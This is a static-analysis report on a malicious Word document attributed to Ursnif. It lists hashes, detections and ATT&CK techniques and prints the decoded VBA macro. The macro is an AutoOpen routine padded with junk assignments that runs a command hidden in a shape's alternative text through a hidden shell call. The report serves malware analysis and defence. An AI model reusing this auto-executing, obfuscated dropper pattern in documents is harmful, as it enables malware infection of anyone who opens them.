Ursnif — Office (OLE) malware analysis

Static analysis result for SHA-256 17af821c262a61b4…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 75.5 KB
Created: 2018-04-19 18:59:00
Authoring application: Microsoft Office Word
First seen: 2019-03-18
MD5: 06cd72ab4b97789007042d056f87d6f2
SHA-1: f849fb86889ecd3eea93112a219a7cbf6fe128b8
SHA-256: 17af821c262a61b46fcb14f6a61928dbec8723de0aedeaf643b2350fd8b3092e
Risk score: 142

Malware Insights

Ursnif · confidence 95%

MITRE ATT&CK: T1059.005 (Visual Basic), T1566.001 (Spearphishing Attachment)

The file is a malicious Office document containing a VBA macro, specifically an AutoOpen macro, which is a common technique for Ursnif. The macro is designed to execute automatically upon opening the document. While the exact download URL is obfuscated within the script, the presence of the AutoOpen macro and the ClamAV detection strongly indicate a dropper functionality.

Heuristics (5)

  • ClamAV: Doc.Dropper.Ursnif-6864686-0 (severity: critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Ursnif-6864686-0
  • VBA macros detected (severity: medium, 1 related finding, OLE_VBA_MACROS)
    Document contains VBA macro code.
  • AutoOpen macro (severity: high, OLE_VBA_AUTOOPEN)
    The VBA project contains an AutoOpen macro.
  • Legacy WordBasic auto-exec macro marker (severity: medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3252 bytes
SHA-256: 72cf430cd0e4f9d1c1360ce4dbca44e022f3ece3535c5b04aa3122f9538b4c85

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "jjebiwy"
Sub AutoOpen()


iRuuQ = 37603

tbexux = 47003

MaJmTIb = 19337

TWafILS = 2683

tnixif = 86364
slosuryly = 55670

AkZcWd = 12145
xzygeny = 41395

hpyn = 56840

qbokyxymig = 99769

xbTYNRFK = 43650

fqWlWJp = 88362

OQphb = 41707

qledizyzoq = 71715
mlyq = 83331

VQEqZblC = 69450
CgkIOhz = 65890

fcyqy = 58430

csenure = 83965

rnyxurovyf = 6700

ANOSoryK = 1325

rdVmyBqC = 34581

QqPmKq = 78970
qpyvyre = 34301

pzgauwbO = 7661
rfebetar = 61069

HJaWinI = 93939

jxycidis = 63478

nHXrS = 25980

CuuHEWb = 60341

dmuxo = 4668

tfewiboxobe = 10998
QsjhpxIe = 17946

dsUPB = 63325
kXpBtemy = 84985

daElD = 16211

QIhaOB = 29789

VufBtcoi = 27796

fwis = 89364

alikUxD = 5557

xHXqMxz = 24036
dhujowi = 95746

gtobo = 57238
iXQAR = 19785

zthVh = 12959

ccalu = ActiveDocument.Shapes("htufakehe").AlternativeText


wzmcGGE = 95165

FNxlsrw = 71182

dZOuzOR = 64365

bDoBXp = 86304

WVHvLJ = 36709
zsylyky = 41518

XmWIjVlv = 17413
pvapisiwi = 84479

LcAyFzv = 39591

qwerakaky = 10431

yASSoQ = 17525

ceGyG = 46601

vOtOSWf = 2206

IQHyxc = 24135
nkob = 66772

atefF = 54830
dxicaqamuh = 41819

shKVNJHq = 29683

khubupecyt = 34136

rNSrW = 80465

zsevab = 90556

wcupunetucy = 54002

clHyjroB = 41143
mbgEN = 47766

mgyq = 27936
jmakanehe = 93658

UdPmaPS = 74414

vhowit = 26759

UkAid = 52470

vpycuva = 7449

frufo = 36401

tRJiU = 32066
ppoly = 56752

kzBvL = 76233
lsomihotaqi = 94466

xKCenfi = 82271

ZhoJCq = 29873

rcupucyxop = 14857

cqyc = 56702

bzedi = 90165

gtDEaC = 74703
lasNbbxW = 1000

JtbTYiED = 9218
SflylxFi = 16908

bpoped = 8385

Interaction.Shell% ccalu, vbHide


lqojohahacu = 30118

vRCGEY = 30994

GeiPBCUv = 15406

YiPVJT = 23258

fzeruvazequ = 26966
ZpBMxY = 7994

wbuzibi = 46598
hjybiqej = 71840

RygcGXyQ = 31176

wsimapazuc = 89717

cwfoKlco = 78093

kpehidypupu = 45495

nrefira = 94583

RHvUmgQ = 26370
sVbTT = 1442

lhovi = 82493
pkofek = 86369

scekyl = 94648

nhecir = 54664

yfWfFO = 26809

jhahesi = 74198

xxyfilawivi = 22623

zkemo = 79547
tSaHTyU = 83223

yJfrec = 10008
VcQeb = 2724

HlVmB = 26978

pnivo = 83611

DRFlOM = 93808

AwqEZasG = 52257

mBtXZC = 36936

cqevi = 99940
LnPef = 97277

ZhcemGn = 95596
cwola = 18822

fwomamoduxy = 31462

uXGainu = 20482

zkekavequku = 83388

gycOXld = 43896

ywmJsAj = 81427

GcutzsQ = 4035
CXmenu = 87267

rrox = 26920
nWSeh = 57954

SsSlV = 66228

kbowozufiqe = 90087

lbyjufil = 24505

CINZfNEt = 90503

jxuquhiso = 40035

oRNYEad = 74586
ncybyqen = 85988

mhaqa = 56294
ddej = 46606

mfatorymuh = 13164

ZCEIi = 1066

OUnhtJir = 46222

ztydep = 46297

mpVHjD = 7727

tYOzJBPp = 86526
skhjEU = 39207

torMVyfI = 22399
jcican = 40440

ppgSKf = 84627

End Sub